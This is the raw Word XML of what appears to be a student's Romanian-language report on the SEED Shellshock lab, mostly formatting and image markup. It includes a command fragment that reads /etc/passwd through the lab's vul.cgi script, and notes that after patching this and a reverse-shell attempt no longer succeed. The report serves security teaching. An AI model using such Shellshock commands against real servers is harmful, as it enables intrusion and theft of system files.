          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/cat /etc/passwd" -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>vul</w:t>
        </w:r>
        <w:hyperlink r:id="rId39">
          <w:r>
            <w:rPr>
              <w:rStyle w:val="InternetLink"/>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              <w:b w:val="false"/>
              <w:bCs w:val="false"/>
              <w:i w:val="false"/>
              <w:iCs w:val="false"/>
              <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
            </w:rPr>
            <w:t>.cgi</w:t>
          </w:r>
        </w:hyperlink>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>om observa ca parsarea se va face corect și nu se va executa comanda cât pe etc/passwd; vom vedea doar executia scriptului din vul.cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-non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943600" cy="154749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40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1547495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">incercam de asemnea atacul de la punctul 5 prin care dorim sa obtinem un reverse shell si de asemenea observam ca parsarea se realizeaza cu succes, doar se va executa scriptul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">vul.cgi </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="28">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>90170</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5715000" cy="188468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41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="1884680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId42"/>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Inconsolata">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>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seed-server.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www.seedlab-shellshock.com/cgi-bin/getenv.cgi" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi"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www.seedlab-shellshock.com/cgi-bin/vul.cgi" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/vul.cgi"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hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/vul.cgi" TargetMode="External"/><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hyperlink" Target="http://www.seedlab-shellshock.com/cgi-bin/vul.cgi" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target=""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eader" Target="header1.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comment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Application>LibreOffice/6.4.6.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>17</Pages>
  <Words>1519</Words>
  <Characters>8450</Characters>
  <CharactersWithSpaces>9824</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2023-03-05T15:14:00Z</dcterms:created>
  <dc:creator>jim</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-27T12:28:56Z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